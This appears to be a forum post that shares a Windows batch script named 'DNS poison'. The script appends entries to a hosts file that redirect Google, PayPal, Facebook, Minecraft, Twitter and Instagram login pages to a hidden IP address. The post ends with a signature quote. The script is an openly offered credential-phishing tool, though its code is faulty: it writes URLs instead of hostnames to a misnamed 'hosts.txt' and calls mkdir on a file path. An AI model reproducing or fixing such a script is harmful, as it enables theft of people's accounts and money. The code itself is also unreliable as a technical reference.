I adapted it so it hits all the following sites (the MD is just a redundancy):
-google accounts login
-paypal
-facebook login
-minecraft
-twitter login
-instagram login
Code:
@echo off
title DNS poison
color 05
mkdir C:\windows\system32\drivers\etc\hosts.txt
echo xx.xxx.xx.xx https://accounts.google.com/ServiceLogin?hl=en&continue=https://www.google.ca/ >> C:\windows\system32\drivers\etc\hosts.txt
echo xx.xxx.xx.xx https://www.paypal.com/ca/webapps/mpp/home >> C:\windows\system32\drivers\etc\hosts.txt
echo xx.xxx.xx.xx https://www.facebook.com/?stype=lo&jlou=AffALiXgLS5-Oe3cv_au3gKuivKkHdCvabRPhjkzQDdtsHPo7QDlfrGhaGUZMUxAF5Nmj2zCxLNEXMWxCYDj1yuX8eHOjkI1u5AWm2Pl6gUihw&smuh=28458&lh=Ac82g1LTt1W9RPO8 >> C:\windows\system32\drivers\etc\hosts.txt
echo xx.xxx.xx.xx https://minecraft.net/login >> C:\windows\system32\drivers\etc\hosts.txt
echo xx.xxx.xx.xx https://www.twitter.com >> C:\windows\system32\drivers\etc\hosts.txt
echo xx.xxx.xx.xx https://instagram.com/accounts/login/ >> C:\windows\system32\drivers\etc\hosts.txt
exit
(all the x's are a hidden IP)
It's often the outcasts, the iconoclasts ... those who have the least to lose because they
don't have much in the first place, who feel the new currents and ride them the farthest.